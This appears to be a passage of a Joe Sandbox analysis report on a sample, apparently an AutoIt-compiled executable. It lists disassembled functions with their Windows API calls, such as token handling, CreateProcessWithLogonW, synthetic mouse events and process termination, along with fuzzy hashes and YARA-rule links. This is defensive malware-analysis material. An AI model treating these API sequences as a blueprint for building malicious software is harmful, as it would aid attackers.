Opcode ID: cef9e4a2b11a025a29360579fdf6e4133b509538186df4fcba9a2122e293f7f1
Instruction ID: 7edec1f6ccaddba0d90d7d9ddbe5aa208fd3787e54700cb460a268c7d881948b
Opcode Fuzzy Hash: cef9e4a2b11a025a29360579fdf6e4133b509538186df4fcba9a2122e293f7f1
Instruction Fuzzy Hash: 5B516B31E00A19AFCF15DF64C845ABEB7B4EF48311F104059EA15BB752CB74AE42EB94

Function 000CEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000CEF06
VariantClear.OLEAUT32(00000013), ref: 000CEF78
VariantClear.OLEAUT32(00000000), ref: 000CEFD3
_memmove.LIBCMT ref: 000CEFFD
VariantClear.OLEAUT32(?), ref: 000CF04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 000CF078

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: ed07645b104bbb097898425cd9b924659b8012a07852e0581dc8e1f74333f1e5
Instruction ID: d8567ca972f5a38d6163119addd00d4bed31f43760bc06e15d9905b2567613fc
Opcode Fuzzy Hash: ed07645b104bbb097898425cd9b924659b8012a07852e0581dc8e1f74333f1e5
Instruction Fuzzy Hash: 7F514CB5A0020ADFDB14CF58C884EAABBF9FF4C314B158569E959DB301E735E911CBA0

Function 000D220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000D2258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000D22A3
IsMenu.USER32(00000000), ref: 000D22C3
CreatePopupMenu.USER32 ref: 000D22F7
GetMenuItemCount.USER32(000000FF), ref: 000D2355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 000D2386

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 3742a3279fd66e27748cdeed9a819b14823ee7f5b66d28a090a4639c0c9aabe8
Instruction ID: 0e0fb8bb9fb92a1ce257ff8c7c92159c31ff724f6642037f41e31c98d186a02b
Opcode Fuzzy Hash: 3742a3279fd66e27748cdeed9a819b14823ee7f5b66d28a090a4639c0c9aabe8
Instruction Fuzzy Hash: 9551AE7060034AEBDF21CF68C888BADBBF5AF65314F10416AE851A7391D3799A44CB61

Function 00071765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00072612: GetWindowLongW.USER32(?,000000EB), ref: 00072623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0007179A
GetWindowRect.USER32(?,?), ref: 000717FE
ScreenToClient.USER32(?,?), ref: 0007181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0007182C
EndPaint.USER32(?,?), ref: 00071876

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 17ca20ecc3a9507c3b64207595ae2fb9372d4e4f096508598be6a650cc7f46c9
Instruction ID: f35cda6a04c818201207759993c23ad95b278bf2ac2a859b97ffe16fbf7071dc
Opcode Fuzzy Hash: 17ca20ecc3a9507c3b64207595ae2fb9372d4e4f096508598be6a650cc7f46c9
Instruction Fuzzy Hash: 6C41A1305047019FD720DF29CC84FBA7BE9FB46724F144669F5A88A2E2CB349845DB62

Function 000FB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(001357B0,00000000,01524C18,?,?,001357B0,?,000FB5A8,?,?), ref: 000FB712
EnableWindow.USER32(00000000,00000000), ref: 000FB736
ShowWindow.USER32(001357B0,00000000,01524C18,?,?,001357B0,?,000FB5A8,?,?), ref: 000FB796
ShowWindow.USER32(00000000,00000004,?,000FB5A8,?,?), ref: 000FB7A8
EnableWindow.USER32(00000000,00000001), ref: 000FB7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 000FB7EF

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 5de521f4b7af931b7a838c8cb9b1377fe239f2a549e528b84b19e2e52ca4e443
Instruction ID: 35e7cede9d61e86d8e39aae06dbecf2d3115fd4874aa8a259ead237e2dde0ed9
Opcode Fuzzy Hash: 5de521f4b7af931b7a838c8cb9b1377fe239f2a549e528b84b19e2e52ca4e443
Instruction Fuzzy Hash: 29416334604349AFDB61EF24C499BB47BE1FF49310F1841B9EA488FA62C731A856EF50

Function 000E709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,000E4E41,?,?,00000000,00000001), ref: 000E70AC

Part of subcall function 000E39A0: GetWindowRect.USER32(?,?), ref: 000E39B3

GetDesktopWindow.USER32 ref: 000E70D6
GetWindowRect.USER32(00000000), ref: 000E70DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 000E710F

Part of subcall function 000D5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 000D52BC

GetCursorPos.USER32(?), ref: 000E713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 000E7199

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 9e2b98e51c3522e65567bb9f500b77c63f56c96e055d81a360ab9ecaae2ebb5c
Instruction ID: 3fed25a698d34c2ad9f4c54db59f15d18c0b315e357f173a15aa274c44c3e859
Opcode Fuzzy Hash: 9e2b98e51c3522e65567bb9f500b77c63f56c96e055d81a360ab9ecaae2ebb5c
Instruction Fuzzy Hash: 9C31B472509346AFD720DF15CC49BABB7E9FF88314F000519F589A7192CB74EA09CB92

Function 000C8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000C80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000C80C0
Part of subcall function 000C80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000C80CA
Part of subcall function 000C80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000C80D9
Part of subcall function 000C80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000C80E0
Part of subcall function 000C80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000C80F6

GetLengthSid.ADVAPI32(?,00000000,000C842F), ref: 000C88CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 000C88D6
HeapAlloc.KERNEL32(00000000), ref: 000C88DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 000C88F6
GetProcessHeap.KERNEL32(00000000,00000000,000C842F), ref: 000C890A
HeapFree.KERNEL32(00000000), ref: 000C8911

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: f38139edf33a47e9ceba9c96e81330aaccde3939e3e534496d8d3710c286b386
Instruction ID: 82ee854fa4c6e7a1be7eb073517b97e13caa94429394e69d647613e547773964
Opcode Fuzzy Hash: f38139edf33a47e9ceba9c96e81330aaccde3939e3e534496d8d3710c286b386
Instruction Fuzzy Hash: E9119D3250120AFBEB509BA4DC49FBE7BA8FF45311F14802DE84597210CB369914EB65

Function 000C85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000C85E2
OpenProcessToken.ADVAPI32(00000000), ref: 000C85E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 000C85F8
CloseHandle.KERNEL32(00000004), ref: 000C8603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000C8632
DestroyEnvironmentBlock.USERENV(00000000), ref: 000C8646

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: f5e72753c9b95ece5b31a20b81fa2abf0c3b850624baeba1de9cd75dc2e8182f
Instruction ID: eaec60f7bada6ab4b36a6a11dd72cca0ad69022ef4809bb30dc794bdac196c3f
Opcode Fuzzy Hash: f5e72753c9b95ece5b31a20b81fa2abf0c3b850624baeba1de9cd75dc2e8182f
Instruction Fuzzy Hash: 33115E7250020AABEF01CF94DD49FEE7BA9EF48304F084069FE05A2160C7759D60EB64

Function 000CB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 000CB7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 000CB7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 000CB7CD
ReleaseDC.USER32(00000000,00000000), ref: 000CB7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 000CB7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 000CB7FE

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 04a3eb1ba89e36dcbbf022d670aff89aff51ef1f3e126aaf543867538c7d12e4
Instruction ID: e860402f7695c894741a4f34ac16c6f654e13a990b0d760d0d497dcebb84dbcf
Opcode Fuzzy Hash: 04a3eb1ba89e36dcbbf022d670aff89aff51ef1f3e126aaf543867538c7d12e4
Instruction Fuzzy Hash: FF017175A00209BBEF109BA69C45F6EBFA8EF48751F004065FA08A7291DA309C00DF90

Function 00090162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00090193
MapVirtualKeyW.USER32(00000010,00000000), ref: 0009019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 000901A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 000901B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 000901B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 000901C1

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: c9151b604e904dc4675b68f2e3647fa62922026e0ddf07995fb5461eaa655b7c
Instruction ID: 701d8b7690335143d086c1a27489e085428329aac08e8437ecbd73236f329b0d
Opcode Fuzzy Hash: c9151b604e904dc4675b68f2e3647fa62922026e0ddf07995fb5461eaa655b7c
Instruction Fuzzy Hash: 31016CB090175A7DE3008F5A8C85B52FFA8FF19354F00411BA15C87941C7F5A864CBE5

Function 000D53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 000D53F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 000D540F
GetWindowThreadProcessId.USER32(?,?), ref: 000D541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000D542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000D5437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000D543E

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 75eb36d333406f7aaed72529673a91d61798fcaca3134b114916e71caa339a54
Instruction ID: df4970c5d70faae1138401873f576266f5ec0484f411e4a0aa06abc09adeb220
Opcode Fuzzy Hash: 75eb36d333406f7aaed72529673a91d61798fcaca3134b114916e71caa339a54
Instruction Fuzzy Hash: 32F06D3224015ABBE3205BA29C0DEFB7A7CEFC6B15F000169FA04D11509AA81A01D6B5

Function 000D7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 000D7243
EnterCriticalSection.KERNEL32(?,?,00080EE4,?,?), ref: 000D7254
TerminateThread.KERNEL32(00000000,000001F6,?,00080EE4,?,?), ref: 000D7261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00080EE4,?,?), ref: 000D726E

Part of subcall function 000D6C35: CloseHandle.KERNEL32(00000000,?,000D727B,?,00080EE4,?,?), ref: 000D6C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 000D7281
LeaveCriticalSection.KERNEL32(?,?,00080EE4,?,?), ref: 000D7288

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 4621eff15a40f59d32b18912ecab86e09de2857571629e74632f5ae4a777e5f3
Instruction ID: 90a2d79126ef8ea54a91dc395c8701f05b4293d265fedd6c64e7bed0a00e717e
Opcode Fuzzy Hash: 4621eff15a40f59d32b18912ecab86e09de2857571629e74632f5ae4a777e5f3
Instruction Fuzzy Hash: 86F05E36540713EBE7912B64ED8C9FA7769FF45712B100532F503915A0DB7A5801DB60

Function 000C8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 000C899D
UnloadUserProfile.USERENV(?,?), ref: 000C89A9
CloseHandle.KERNEL32(?), ref: 000C89B2
CloseHandle.KERNEL32(?), ref: 000C89BA
GetProcessHeap.KERNEL32(00000000,?), ref: 000C89C3
HeapFree.KERNEL32(00000000), ref: 000C89CA

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: cb22f79ee71c7c94e6127231b15000a0735a077652f7f09b6f44c491a1636752
Instruction ID: e9bf4d4b4b9d170548c81fea3a82994f6b0deac7d5518ced3ae6ab4d2a0b7ece
Opcode Fuzzy Hash: cb22f79ee71c7c94e6127231b15000a0735a077652f7f09b6f44c491a1636752
Instruction Fuzzy Hash: A3E05977104506FBE6012FE5EC0C975BF69FF897627584631F215C1870CB365461EB50

Function 000E85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000E8613
CharUpperBuffW.USER32(?,?), ref: 000E8722
VariantClear.OLEAUT32(?), ref: 000E889A

Part of subcall function 000D7562: VariantInit.OLEAUT32(00000000), ref: 000D75A2
Part of subcall function 000D7562: VariantCopy.OLEAUT32(00000000,?), ref: 000D75AB
Part of subcall function 000D7562: VariantClear.OLEAUT32(00000000), ref: 000D75B7

Strings

AUTOIT.ERROR, xrefs: 000E8728
Incorrect Parameter format, xrefs: 000E864B, 000E880D

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 1481617841eef0935a2c1b3c47b49188f2ab7032d6b1099bc8e9148773beae48
Instruction ID: fe92fd12cb8aec9e88bd2cd68e5aeed8f556d53e687418f2fe6468f047073bb9
Opcode Fuzzy Hash: 1481617841eef0935a2c1b3c47b49188f2ab7032d6b1099bc8e9148773beae48
Instruction Fuzzy Hash: 75919E71A08341DFC710DF25C4849AAB7E4EF89714F14892EF89E9B362DB30E905CB92

Function 000D2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0008FC86: _wcscpy.LIBCMT ref: 0008FCA9

_memset.LIBCMT ref: 000D2B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000D2BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000D2C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 000D2C97

Strings

0, xrefs: 000D2B73

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 92c237e6269ae6b55c0069bce568a0c5b379ce6e3e4945ea5c99b3d0eb500723
Instruction ID: 85e7f6c082403a9e6bb0229849ae561658d19dafc30f3fb009afcd264a1d5b9f
Opcode Fuzzy Hash: 92c237e6269ae6b55c0069bce568a0c5b379ce6e3e4945ea5c99b3d0eb500723
Instruction Fuzzy Hash: 1251CE716183019ED764DE28C845AAFB7E8EFA5320F041A2EF895D3391DB70CD049762

Function 000CD56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000CD5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 000CD60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 000CD61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000CD69D

Strings

DllGetClassObject, xrefs: 000CD610

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: c5913ef54f8d944b65005777212b715874a3c3b284072cb322b1fd13eb39a75c
Instruction ID: a1d4b99cc7b29039196fb4864e9a80bcc363f8c438766f32cf54b9d8fbd54024
Opcode Fuzzy Hash: c5913ef54f8d944b65005777212b715874a3c3b284072cb322b1fd13eb39a75c
Instruction Fuzzy Hash: 8E419AB1600205EFDB15CF64C884FAEBBA9EF44314F1181BEE809AF246D7B1D944DBA0

Function 000D2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000D27C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 000D27DC
DeleteMenu.USER32(?,00000007,00000000), ref: 000D2822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00135890,00000000), ref: 000D286B

Strings

0, xrefs: 000D27B5

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
